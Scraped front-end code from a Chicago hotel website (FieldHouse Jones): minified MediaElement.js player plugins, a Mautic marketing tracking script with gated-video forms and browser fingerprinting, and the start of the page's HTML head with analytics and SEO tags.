d=this;""===c&&(c=mejs.language.codes[b]||b),d.captionsButton.find("input[value="+b+"]").prop("disabled",!1).siblings("label").html(c),d.options.startLanguage==b&&a("#"+d.id+"_captions_"+b).prop("checked",!0).trigger("click"),d.adjustLanguageBox()},removeTrackButton:function(a){var b=this;b.captionsButton.find("input[value="+a+"]").closest("li").remove(),b.adjustLanguageBox()},addTrackButton:function(b,c){var d=this;""===c&&(c=mejs.language.codes[b]||b),d.captionsButton.find("ul").append(a('<li><input type="radio" name="'+d.id+'_captions" id="'+d.id+"_captions_"+b+'" value="'+b+'" disabled="disabled" /><label for="'+d.id+"_captions_"+b+'">'+c+" (loading)</label></li>")),d.adjustLanguageBox(),d.container.find(".mejs-captions-translations option[value="+b+"]").remove()},adjustLanguageBox:function(){var a=this;a.captionsButton.find(".mejs-captions-selector").height(a.captionsButton.find(".mejs-captions-selector ul").outerHeight(!0)+a.captionsButton.find(".mejs-captions-translations").outerHeight(!0))},checkForTracks:function(){var a=this,b=!1;if(a.options.hideCaptionsButtonWhenEmpty){for(i=0;i<a.tracks.length;i++)if("subtitles"==a.tracks[i].kind&&a.tracks[i].isLoaded){b=!0;break}b||(a.captionsButton.hide(),a.setControlsSize())}},displayCaptions:function(){if("undefined"!=typeof this.tracks){var a,b=this,c=b.selectedTrack;if(null!==c&&c.isLoaded){for(a=0;a<c.entries.times.length;a++)if(b.media.currentTime>=c.entries.times[a].start&&b.media.currentTime<=c.entries.times[a].stop)return b.captionsText.html(c.entries.text[a]).attr("class","mejs-captions-text "+(c.entries.times[a].identifier||"")),void b.captions.show().height(0);b.captions.hide()}else b.captions.hide()}},setupSlides:function(a){var b=this;b.slides=a,b.slides.entries.imgs=[b.slides.entries.text.length],b.showSlide(0)},showSlide:function(b){if("undefined"!=typeof this.tracks&&"undefined"!=typeof this.slidesContainer){var c=this,d=c.slides.entries.text[b],e=c.slides.entries.imgs[b];"undefined"==typeof e||"undefined"==typeof e.fadeIn?c.slides.entries.imgs[b]=e=a('<img src="'+d+'">').on("load",function(){e.appendTo(c.slidesContainer).hide().fadeIn().siblings(":visible").fadeOut()}):e.is(":visible")||e.is(":animated")||e.fadeIn().siblings(":visible").fadeOut()}},displaySlides:function(){if("undefined"!=typeof this.slides){var a,b=this,c=b.slides;for(a=0;a<c.entries.times.length;a++)if(b.media.currentTime>=c.entries.times[a].start&&b.media.currentTime<=c.entries.times[a].stop)return void b.showSlide(a)}},displayChapters:function(){var a,b=this;for(a=0;a<b.tracks.length;a++)if("chapters"==b.tracks[a].kind&&b.tracks[a].isLoaded){b.drawChapters(b.tracks[a]),b.hasChapters=!0;break}},drawChapters:function(b){var c,d,e=this,f=0,g=0;for(e.chapters.empty(),c=0;c<b.entries.times.length;c++)d=b.entries.times[c].stop-b.entries.times[c].start,f=Math.floor(d/e.media.duration*100),(f+g>100||c==b.entries.times.length-1&&100>f+g)&&(f=100-g),e.chapters.append(a('<div class="mejs-chapter" rel="'+b.entries.times[c].start+'" style="left: '+g.toString()+"%;width: "+f.toString()+'%;"><div class="mejs-chapter-block'+(c==b.entries.times.length-1?" mejs-chapter-block-last":"")+'"><span class="ch-title">'+b.entries.text[c]+'</span><span class="ch-time">'+mejs.Utility.secondsToTimeCode(b.entries.times[c].start,e.options)+"&ndash;"+mejs.Utility.secondsToTimeCode(b.entries.times[c].stop,e.options)+"</span></div></div>")),g+=f;e.chapters.find("div.mejs-chapter").click(function(){e.media.setCurrentTime(parseFloat(a(this).attr("rel"))),e.media.paused&&e.media.play()}),e.chapters.show()}}),mejs.language={codes:{af:"Afrikaans",sq:"Albanian",ar:"Arabic",be:"Belarusian",bg:"Bulgarian",ca:"Catalan",zh:"Chinese","zh-cn":"Chinese Simplified","zh-tw":"Chinese Traditional",hr:"Croatian",cs:"Czech",da:"Danish",nl:"Dutch",en:"English",et:"Estonian",fl:"Filipino",fi:"Finnish",fr:"French",gl:"Galician",de:"German",el:"Greek",ht:"Haitian Creole",iw:"Hebrew",hi:"Hindi",hu:"Hungarian",is:"Icelandic",id:"Indonesian",ga:"Irish",it:"Italian",ja:"Japanese",ko:"Korean",lv:"Latvian",lt:"Lithuanian",mk:"Macedonian",ms:"Malay",mt:"Maltese",no:"Norwegian",fa:"Persian",pl:"Polish",pt:"Portuguese",ro:"Romanian",ru:"Russian",sr:"Serbian",sk:"Slovak",sl:"Slovenian",es:"Spanish",sw:"Swahili",sv:"Swedish",tl:"Tagalog",th:"Thai",tr:"Turkish",uk:"Ukrainian",vi:"Vietnamese",cy:"Welsh",yi:"Yiddish"}},mejs.TrackFormatParser={webvtt:{pattern_timecode:/^((?:[0-9]{1,2}:)?[0-9]{2}:[0-9]{2}([,.][0-9]{1,3})?) --\> ((?:[0-9]{1,2}:)?[0-9]{2}:[0-9]{2}([,.][0-9]{3})?)(.*)$/,parse:function(b){for(var c,d,e,f=0,g=mejs.TrackFormatParser.split2(b,/\r?\n/),h={text:[],times:[]};f<g.length;f++){if(c=this.pattern_timecode.exec(g[f]),c&&f<g.length){for(f-1>=0&&""!==g[f-1]&&(e=g[f-1]),f++,d=g[f],f++;""!==g[f]&&f<g.length;)d=d+"\n"+g[f],f++;d=a.trim(d).replace(/(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/gi,"<a href='$1' target='_blank'>$1</a>"),h.text.push(d),h.times.push({identifier:e,start:0===mejs.Utility.convertSMPTEtoSeconds(c[1])?.2:mejs.Utility.convertSMPTEtoSeconds(c[1]),stop:mejs.Utility.convertSMPTEtoSeconds(c[3]),settings:c[5]})}e=""}return h}},dfxp:{parse:function(b){b=a(b).filter("tt");var c,d,e=0,f=b.children("div").eq(0),g=f.find("p"),h=b.find("#"+f.attr("style")),i={text:[],times:[]};if(h.length){var j=h.removeAttr("id").get(0).attributes;if(j.length)for(c={},e=0;e<j.length;e++)c[j[e].name.split(":")[1]]=j[e].value}for(e=0;e<g.length;e++){var k,l={start:null,stop:null,style:null};if(g.eq(e).attr("begin")&&(l.start=mejs.Utility.convertSMPTEtoSeconds(g.eq(e).attr("begin"))),!l.start&&g.eq(e-1).attr("end")&&(l.start=mejs.Utility.convertSMPTEtoSeconds(g.eq(e-1).attr("end"))),g.eq(e).attr("end")&&(l.stop=mejs.Utility.convertSMPTEtoSeconds(g.eq(e).attr("end"))),!l.stop&&g.eq(e+1).attr("begin")&&(l.stop=mejs.Utility.convertSMPTEtoSeconds(g.eq(e+1).attr("begin"))),c){k="";for(var m in c)k+=m+":"+c[m]+";"}k&&(l.style=k),0===l.start&&(l.start=.2),i.times.push(l),d=a.trim(g.eq(e).html()).replace(/(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/gi,"<a href='$1' target='_blank'>$1</a>"),i.text.push(d),0===i.times.start&&(i.times.start=2)}return i}},split2:function(a,b){return a.split(b)}},3!="x\n\ny".split(/\n/gi).length&&(mejs.TrackFormatParser.split2=function(a,b){var c,d=[],e="";for(c=0;c<a.length;c++)e+=a.substring(c,c+1),b.test(e)&&(d.push(e.replace(b,"")),e="");return d.push(e),d})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{contextMenuItems:[{render:function(a){return"undefined"==typeof a.enterFullScreen?null:a.isFullScreen?mejs.i18n.t("Turn off Fullscreen"):mejs.i18n.t("Go Fullscreen")},click:function(a){a.isFullScreen?a.exitFullScreen():a.enterFullScreen()}},{render:function(a){return a.media.muted?mejs.i18n.t("Unmute"):mejs.i18n.t("Mute")},click:function(a){a.media.muted?a.setMuted(!1):a.setMuted(!0)}},{isSeparator:!0},{render:function(a){return mejs.i18n.t("Download Video")},click:function(a){window.location.href=a.media.currentSrc}}]}),a.extend(MediaElementPlayer.prototype,{buildcontextmenu:function(b,c,d,e){b.contextMenu=a('<div class="mejs-contextmenu"></div>').appendTo(a("body")).hide(),b.container.bind("contextmenu",function(a){return b.isContextMenuEnabled?(a.preventDefault(),b.renderContextMenu(a.clientX-1,a.clientY-1),!1):void 0}),b.container.bind("click",function(){b.contextMenu.hide()}),b.contextMenu.bind("mouseleave",function(){b.startContextMenuTimer()})},cleancontextmenu:function(a){a.contextMenu.remove()},isContextMenuEnabled:!0,enableContextMenu:function(){this.isContextMenuEnabled=!0},disableContextMenu:function(){this.isContextMenuEnabled=!1},contextMenuTimeout:null,startContextMenuTimer:function(){var a=this;a.killContextMenuTimer(),a.contextMenuTimer=setTimeout(function(){a.hideContextMenu(),a.killContextMenuTimer()},750)},killContextMenuTimer:function(){var a=this.contextMenuTimer;null!=a&&(clearTimeout(a),delete a,a=null)},hideContextMenu:function(){this.contextMenu.hide()},renderContextMenu:function(b,c){for(var d=this,e="",f=d.options.contextMenuItems,g=0,h=f.length;h>g;g++)if(f[g].isSeparator)e+='<div class="mejs-contextmenu-separator"></div>';else{var i=f[g].render(d);null!=i&&(e+='<div class="mejs-contextmenu-item" data-itemindex="'+g+'" id="element-'+1e6*Math.random()+'">'+i+"</div>")}d.contextMenu.empty().append(a(e)).css({top:c,left:b}).show(),d.contextMenu.find(".mejs-contextmenu-item").each(function(){var b=a(this),c=parseInt(b.data("itemindex"),10),e=d.options.contextMenuItems[c];"undefined"!=typeof e.show&&e.show(b,d),b.click(function(){"undefined"!=typeof e.click&&e.click(d),d.contextMenu.hide()})}),setTimeout(function(){d.killControlsTimer("rev3")},100)}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{skipBackInterval:30,skipBackText:mejs.i18n.t("Skip back %1 seconds")}),a.extend(MediaElementPlayer.prototype,{buildskipback:function(b,c,d,e){var f=this,g=f.options.skipBackText.replace("%1",f.options.skipBackInterval);a('<div class="mejs-button mejs-skip-back-button"><button type="button" aria-controls="'+f.id+'" title="'+g+'" aria-label="'+g+'">'+f.options.skipBackInterval+"</button></div>").appendTo(c).click(function(){e.setCurrentTime(Math.max(e.currentTime-f.options.skipBackInterval,0)),a(this).find("button").blur()})}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{postrollCloseText:mejs.i18n.t("Close")}),a.extend(MediaElementPlayer.prototype,{buildpostroll:function(b,c,d,e){var f=this,g=f.container.find('link[rel="postroll"]').attr("href");"undefined"!=typeof g&&(b.postroll=a('<div class="mejs-postroll-layer mejs-layer"><a class="mejs-postroll-close" onclick="$(this).parent().hide();return false;">'+f.options.postrollCloseText+'</a><div class="mejs-postroll-layer-content"></div></div>').prependTo(d).hide(),f.media.addEventListener("ended",function(c){a.ajax({dataType:"html",url:g,success:function(a,b){d.find(".mejs-postroll-layer-content").html(a)}}),b.postroll.show()},!1))}})}(mejs.$);MauticJS.processGatedVideos(MauticJS.videoElements);}};MauticJS.processGatedVideos=function(videoElements){window.mediaPlayers=[];window.setInterval(function(e){MauticJS.iterateCollection(mediaPlayers)(function(node,i){if(mediaPlayers[i].views){MauticJS.iterateCollection(mediaPlayers[i].views)(function(nodeA,iA){if(!node.views[iA].sent){MauticJS.makeCORSRequest('POST','https://ma.hatcocorp.com/video/hit',node.views[iA],function(data){if(data.success&&node.views[iA].locked){node.views[iA].sent=true;}});}});}});},3000);MauticJS.addVideoView=function(i,totalWatched){if(totalWatched==0){return;} var viewId=mediaPlayers[i].views.length;var view={guid:MauticJS.guid(),locked:false,duration:mediaPlayers[i].mediaElement.duration,url:mediaPlayers[i].mediaElement.src};MauticJS.iterateCollection(mediaPlayers[i].views)(function(node,j){if(mediaPlayers[i].views[j].locked==false){viewId=j;view=mediaPlayers[i].views[j];}});view.total_watched=totalWatched;mediaPlayers[i].views[viewId]=view;};MauticJS.endCurrentView=function(i){var viewId=0;MauticJS.iterateCollection(mediaPlayers[i].views)(function(node,j){if(mediaPlayers[i].views[j].locked==false){viewId=j;}});mediaPlayers[i].views[viewId].locked=true;};MauticJS.iterateCollection(videoElements)(function(node,i){var playerFeatures=[];var source=node.getElementsByTagName('source')[0];if(source.type==='video/mp4'){node.dataset.mp4=true;playerFeatures=['playpause','progress','current','duration','volume','fullscreen'];} if(!node.id){node.id='mautic-player-'+i;} mediaPlayers[i]=[];if(node.dataset.formId){var cookieName='mautic-player-'+i+'-'+node.dataset.formId;MauticJS.makeCORSRequest('GET','https://ma.hatcocorp.com/form/embed/'+node.dataset.formId,{},function(data){mediaPlayers[i].formHtml=data;});}else{mediaPlayers[i].formHtml='';} if(!node.dataset.formId&&!node.dataset.mauticVideo){return;} mediaPlayers[i].player=new MediaElementPlayer('#'+node.id,{features:playerFeatures,alwaysShowControls:true,enableKeyboard:false,success:function(mediaElement,domElement){mediaPlayers[i].inPoster=false;mediaPlayers[i].success=false;mediaPlayers[i].views=[];mediaPlayers[i].mediaElement=mediaElement;if(!node.dataset.mp4){node.parentElement.parentElement.parentElement.className+=' no-controls';} var iframes=node.parentElement.getElementsByTagName('iframe');if(iframes){MauticJS.iterateCollection(iframes)(function(node,i){node.setAttribute('tabindex',-1);});} mediaElement.addEventListener('ended',function(e){MauticJS.endCurrentView(i);});mediaElement.addEventListener('timeupdate',function(e){var currentTime=0;if('Event'==e.constructor.name){currentTime=e.srcElement.currentTime;}else{currentTime=e.currentTime;} MauticJS.addVideoView(i,currentTime);if(node.dataset.formId&&document.cookie.indexOf(cookieName)==-1&&currentTime>=node.dataset.gateTime&&mediaPlayers[i].inPoster===false&&mediaPlayers[i].success===false){if(document.activeElement.tagName=='IFRAME'){window.mejs.previousActiveElement=document.activeElement;document.activeElement.blur();} mediaPlayers[i].inPoster=true;mediaPlayers[i].player.pause();mediaPlayers[i].poster=document.getElementById(node.id).parentElement.parentElement.getElementsByClassName('mejs-poster')[0];mediaPlayers[i].poster.innerHTML=mediaPlayers[i].formHtml;mediaPlayers[i].poster.style.display='block';mediaPlayers[i].form=mediaPlayers[i].poster.getElementsByTagName('form')[0];mediaPlayers[i].form.className+=' mautic-gated-video-style';mediaPlayers[i].form.addEventListener('submit',function(e){e.preventDefault();MauticJS.makeCORSRequest('POST','https://ma.hatcocorp.com/form/submit/ajax?formId='+node.dataset.formId,jQuery(mediaPlayers[i].form).serialize(),function(data){if(data.success){mediaPlayers[i].success=true;if(!data.message){mediaPlayers[i].poster.style.display='none';mediaPlayers[i].player.play();window.mejs.previousActiveElement.focus();} document.cookie=cookieName+"=true; max-age="+60*60*24*7;} if(data.message){var position=parseInt(mediaPlayers[i].poster.style.height)/1.4;mediaPlayers[i].poster.innerHTML='<p style="padding:20px;padding-top:'+position+'px;" class="mautic-response">'+data.message+'</p>';setTimeout(function(){mediaPlayers[i].poster.style.display='none';mediaPlayers[i].player.play();if(window.mejs.previousActiveElement&&window.mejs.previousActiveElement.tagName=='IFRAME'){window.mejs.previousActiveElement.focus();}},3000);}else if(data.validationErrors){jQuery('#mauticform_'+data.formName+' .mauticform-errormsg').css('display','none');jQuery.each(data.validationErrors,function(field,message){if(jQuery('#mauticform_'+data.formName+'_'+field+' .mauticform-errormsg')){jQuery('#mauticform_'+data.formName+'_'+field+' .mauticform-errormsg').css('display','block');}});}});return false;});}});}});if(node.autoplay){mediaPlayers[i].player.play();}});} MauticJS.documentReady(MauticJS.initGatedVideo);MauticJS.mtcEventSet=false;document.addEventListener('mauticPageEventDelivered',function(e){var detail=e.detail;if(!MauticJS.mtcEventSet&&detail.response&&detail.response.events){MauticJS.setTrackedEvents(detail.response.events);}});MauticJS.setTrackedEvents=function(events){MauticJS.mtcEventSet=true;if(typeof fbq!=='undefined'&&typeof events.facebook_pixel!=='undefined'){var e=events.facebook_pixel;for(var i=0;i<e.length;i++){if(typeof e[i]['action']!=='undefined'&&typeof e[i]['label']!=='undefined') fbq('trackCustom',e[i]['action'],{eventLabel:e[i]['label']});}} if(typeof ga!=='undefined'&&typeof events.google_analytics!=='undefined'){var e=events.google_analytics;for(var i=0;i<e.length;i++){if(typeof e[i]['action']!=='undefined'&&typeof e[i]['label']!=='undefined') ga('send',{hitType:'event',eventCategory:e[i]['category'],eventAction:e[i]['action'],eventLabel:e[i]['label'],});}} if(typeof events.focus_item!=='undefined'){var e=events.focus_item;for(var i=0;i<e.length;i++){if(typeof e[i]['id']!=='undefined'&&typeof e[i]['js']!=='undefined'){MauticJS.insertScript(e[i]['js']);}}}};(function(m,l,n,d){m.pageTrackingUrl=(l.protocol=='https:'?'https:':'https:')+'//ma.hatcocorp.com/mtracking.gif';m.pageTrackingCORSUrl=(l.protocol=='https:'?'https:':'https:')+'//ma.hatcocorp.com/mtc/event';m.contactIdUrl=(l.protocol=='https:'?'https:':'https:')+'//ma.hatcocorp.com/mtc';m.fingerprint=null;m.fingerprintComponents=null;m.fingerprintIsLoading=false;m.addFingerprint=function(params){for(var componentId in m.fingerprintComponents){var component=m.fingerprintComponents[componentId];if(typeof component.key!=='undefined'){if(component.key==='resolution'){params.resolution=component.value[0]+'x'+component.value[1];}else if(component.key==='timezone_offset'){params.timezone_offset=component.value;}else if(component.key==='navigator_platform'){params.platform=component.value;}else if(component.key==='adblock'){params.adblock=component.value;}else if(component.key==='do_not_track'){params.do_not_track=component.value;}}} params.fingerprint=m.fingerprint;return params;} m.deliverPageEvent=function(event,params){if(!m.firstDeliveryMade&&params['counter']>0){setTimeout(function(){m.deliverPageEvent(event,params);},5);return;} if(m.fingerprintComponents){params=m.addFingerprint(params);} if(m.preEventDeliveryQueue.length&&m.beforeFirstDeliveryMade===false){for(var i=0;i<m.preEventDeliveryQueue.length;i++){m.preEventDeliveryQueue[i](params);} params=m.appendTrackedContact(params);m.beforeFirstDeliveryMade=true;} MauticJS.makeCORSRequest('POST',m.pageTrackingCORSUrl,params,function(response){MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':event,'params':params,'response':response});},function(){m.buildTrackingImage(event,params);m.firstDeliveryMade=true;});} m.buildTrackingImage=function(pageview,params){delete m.trackingPixel;m.trackingPixel=new Image();if(typeof pageview[3]==='object'){var events=['onabort','onerror','onload'];for(var i=0;i<events.length;i++){var e=events[i];if(typeof pageview[3][e]==='function'){m.trackingPixel[e]=pageview[3][e];}}} m.trackingPixel.onload=function(e){MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':pageview,'params':params,'image':true});};m.trackingPixel.src=m.pageTrackingUrl+'?'+m.serialize(params);} m.pageViewCounter=0;m.sendPageview=function(pageview){var queue=[];if(!pageview){if(typeof m.getInput==='function'){queue=m.getInput('send','pageview');}else{return false;}}else{queue.push(pageview);} if(queue){for(var i=0;i<queue.length;i++){var event=queue[i];var params={page_title:d.title,page_language:n.language,page_referrer:(d.referrer)?d.referrer.split('/')[2]:'',page_url:l.href,counter:m.pageViewCounter};params=MauticJS.appendTrackedContact(params);if(typeof event[2]==='object'){for(var attr in event[2]){params[attr]=event[2][attr];}} m.handleFingerprintInit(event,params);m.pageViewCounter++;}}} m.handleFingerprintInit=function(event,params){if(m.fingerprintComponents){m.deliverPageEvent(event,params);}else if(!m.fingerprint&&m.fingerprintIsLoading===false){m.fingerprintIsLoading=true;new Fingerprint2().get(function(result,components){m.fingerprintIsLoading=false;m.fingerprint=result;m.fingerprintComponents=components;m.deliverPageEvent(event,params);});}else if(m.fingerprintIsLoading===true){var fingerprintLoop=window.setInterval(function(){if(m.fingerprintIsLoading===false){m.deliverPageEvent(event,params);clearInterval(fingerprintLoop);}},5);}else{m.deliverPageEvent(event,params);}} m.sendPageview();document.addEventListener('eventAddedToMauticQueue',function(e){m.sendPageview(e.detail);});})(MauticJS,location,navigator,document);if(typeof MauticDomain=='undefined'){var MauticDomain='https://ma.hatcocorp.com';} if(typeof MauticLang=='undefined'){var MauticLang={'submittingMessage':"Please wait..."};} MauticJS.replaceDynamicContent=function(params){params=params||{};var dynamicContentSlots=document.querySelectorAll('.mautic-slot, [data-slot="dwc"]');if(dynamicContentSlots.length){MauticJS.iterateCollection(dynamicContentSlots)(function(node,i){var slotName=node.dataset['slotName'];if('undefined'===typeof slotName){slotName=node.dataset['paramSlotName'];} if('undefined'===typeof slotName){node.innerHTML='';return;} var url='https://ma.hatcocorp.com/dwc/slotNamePlaceholder'.replace('slotNamePlaceholder',slotName);MauticJS.makeCORSRequest('GET',url,params,function(response,xhr){if(response.content){var dwcContent=response.content;node.innerHTML=dwcContent;if(response.id&&response.sid){MauticJS.setTrackedContact(response);} if(dwcContent.search("mauticform_wrapper")>0){if(typeof MauticSDK=='undefined'){MauticJS.insertScript('https://ma.hatcocorp.com/media/js/mautic-form.js');var fileInterval=setInterval(function(){if(typeof MauticSDK!='undefined'){MauticSDK.onLoad();clearInterval(fileInterval);}},100);}else{MauticSDK.onLoad();}} var m;var regEx=/<script[^>]+src="?([^"\s]+)"?\s/g;while(m=regEx.exec(dwcContent)){if((m[1]).search("/focus/")>0){MauticJS.insertScript(m[1]);}} if(dwcContent.search("fr-gatedvideo")>0){MauticJS.initGatedVideo();}}});});}};MauticJS.beforeFirstEventDelivery(MauticJS.replaceDynamicContent);
0
<!DOCTYPE html> <html lang="en-US"> <head> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MRJB26F');</script> <!-- End Google Tag Manager --> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/> <title>Hotel in River North Chicago - FieldHouse Jones</title> <!-- This site is optimized with the Yoast SEO plugin v11.2.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Visit Chicago and experience the lodging phenomenon of FieldHouse Jones. From our hotel&#039;s River North location, you can enjoy all the fun of Chicago."/> <link rel="canonical" href="https://fieldhousejones.com/"/> <meta property="og:locale" content="en_US"/> <meta property="og:type" content="website"/> <meta property="og:title" content="Hotel in River North Chicago - FieldHouse Jones"/> <meta property="og:description" content="Visit Chicago and experience the lodging phenomenon of FieldHouse Jones. From our hotel&#039;s River North location, you can enjoy all the fun of Chicago."/> <meta property="og:url" content="https://fieldhousejones.com/"/> <meta property="og:site_name" content="FieldHouse Jones"/> <meta name="twitter:card" content="summary"/> <meta name="twitter:description" content="Visit Chicago and experience the lodging phenomenon of FieldHouse Jones. From our hotel&#039;s River North location, you can enjoy all the fun of Chicago."/> <meta name="twitter:title" content="Hotel in River North Chicago - FieldHouse Jones"/> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://fieldhousejones.com/#organization","name":"Fieldhouse Jones","url":"https://fieldhousejones.com/","sameAs":[],"logo":{"@type":"ImageObject","@id":"https://fieldhousejones.com/#logo","url":"https://fieldhousejones.com/wp-content/uploads/2016/08/Fieldhouse-Jones.png","width":900,"height":420,"caption":"Fieldhouse Jones"},"image":{"@id":"https://fieldhousejones.com/#logo"}},{"@type":"WebSite","@id":"https://fieldhousejones.com/#website","url":"https://fieldhousejones.com/","name":"FieldHouse Jones","publisher":{"@id":"https://fieldhousejones.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://fieldhousejones.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://fieldhousejones.com/#webpage","url":"https://fieldhousejones.com/","inLanguage":"en-US","name":"Hotel in River North Chicago - FieldHouse Jones","isPartOf":{"@id":"https://fieldhousejones.com/#website"},"about":{"@id":"https://fieldhousejones.com/#organization"},"datePublished":"2016-01-06T06:10:54+00:00","dateModified":"2019-04-11T04:07:04+00:00","description":"Visit Chicago and experience the lodging phenomenon of FieldHouse Jones. From our hotel's River North location, you can enjoy all the fun of Chicago."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com'/> <link rel='dns-prefetch' href='//s.w.org'/> <link rel="alternate" type="application/rss+xml" title="FieldHouse Jones &raquo; Feed" href="https://fieldhousejones.com/feed/"/> <link rel="alternate" type="application/rss+xml" title="FieldHouse Jones &raquo; Comments Feed" href="https://fieldhousejones.com/comments/feed/"/> <script type="text/javascript">window._wpemojiSettings={"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/fieldhousejones.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}};!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <style type="text/css">img.wp-smiley,img.emoji{display:inline!important;border:none!important;box-shadow:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-.1em!important;background:none!important;padding:0!important}</style> <link rel='stylesheet' id='wp-block-library-css' href='https://fieldhousejones.com/wp-includes/css/dist/block-library/style.min.css,qver=5.2.pagespeed.ce.N1vWXWD_PI.css' type='text/css' media='all'/> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://fieldhousejones.com/wp-content/plugins/revslider/public/assets/css/A.settings.css,qver=5.4.6.2.pagespeed.cf.o_H_KTiS4A.css' type='text/css' media='all'/> <style id='rs-plugin-settings-inline-css' type='text/css'>#rs-demo-id{}</style> <link rel='stylesheet' id='ewd-ufaq-style-css' href='https://fieldhousejones.com/wp-content/plugins/ultimate-faqs/css/A.ewd-ufaq-styles.css,qver=5.2.pagespeed.cf.0iPujBCvkr.css' type='text/css' media='all'/> <link rel='stylesheet' id='ewd-ufaq-rrssb-css' href='https://fieldhousejones.com/wp-content/plugins/ultimate-faqs/css/rrssb-min.css,qver=5.2.pagespeed.ce.hGLYGuhnB6.css' type='text/css' media='all'/> <link rel='stylesheet' id='wyde-animations-css' href='https://fieldhousejones.com/wp-content/plugins/wyde-core/shortcodes/css/A.animation.css,qver=3.1.6.pagespeed.cf.OsY9ZPThmH.css' type='text/css' media='all'/> <link rel='stylesheet' id='wyde-font-awesome-css' href='https://fieldhousejones.com/wp-content/plugins/wyde-core/assets/css/A.font-awesome.min.css,qver=4.6.3.pagespeed.cf.YaV9IcR0kC.css' type='text/css' media='all'/> <style id='overlap-css' media='all'></style> <link rel='stylesheet' id='overlap-main-css' href='https://fieldhousejones.com/wp-content/themes/overlap/css/A.main.css,qver=1.0.pagespeed.cf.YQrh_3lec7.css' type='text/css' media='all'/> <link rel='stylesheet' id='overlap-icons-css' href='https://fieldhousejones.com/wp-content/themes/overlap/css/A.icons.css,qver=1.0.pagespeed.cf.eqs8J0Y8Tv.css' type='text/css' media='all'/> <link rel='stylesheet' id='overlap-child-css' href='https://fieldhousejones.com/wp-content/themes/holidayjones%20-%20fieldhouse/A.style.css,qver=1.2.pagespeed.cf.TxnoY5T9_S.css' type='text/css' media='all'/> <link rel='stylesheet' id='overlap-shortcodes-css' href='https://fieldhousejones.com/wp-content/themes/overlap/css/A.shortcodes.css,qver=1.0.pagespeed.cf.A5DDAuNbhN.css' type='text/css' media='all'/> <!--[if lt IE 9]> <link rel='stylesheet' id='vc_lte_ie9-css' href='https://fieldhousejones.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?ver=6.0.1' type='text/css' media='screen' /> <![endif]--> <link rel='stylesheet' id='bsf-Defaults-css' href='https://fieldhousejones.com/wp-content/uploads/smile_fonts/Defaults/A.Defaults.css,qver=5.2.pagespeed.cf.gE8rGhmL9j.css' type='text/css' media='all'/> <link rel='stylesheet' id='redux-google-fonts-overlap_options-css' href='https://fonts.googleapis.com/css?family=Roboto+Condensed%3A300%2C400%2C700%2C300italic%2C400italic%2C700italic%7CRoboto%3A100%2C300%2C400%2C500%2C700%2C900%2C100italic%2C300italic%2C400italic%2C500italic%2C700italic%2C900italic&#038;subset=latin&#038;ver=1556290962' type='text/css' media='all'/> <script type='text/javascript' 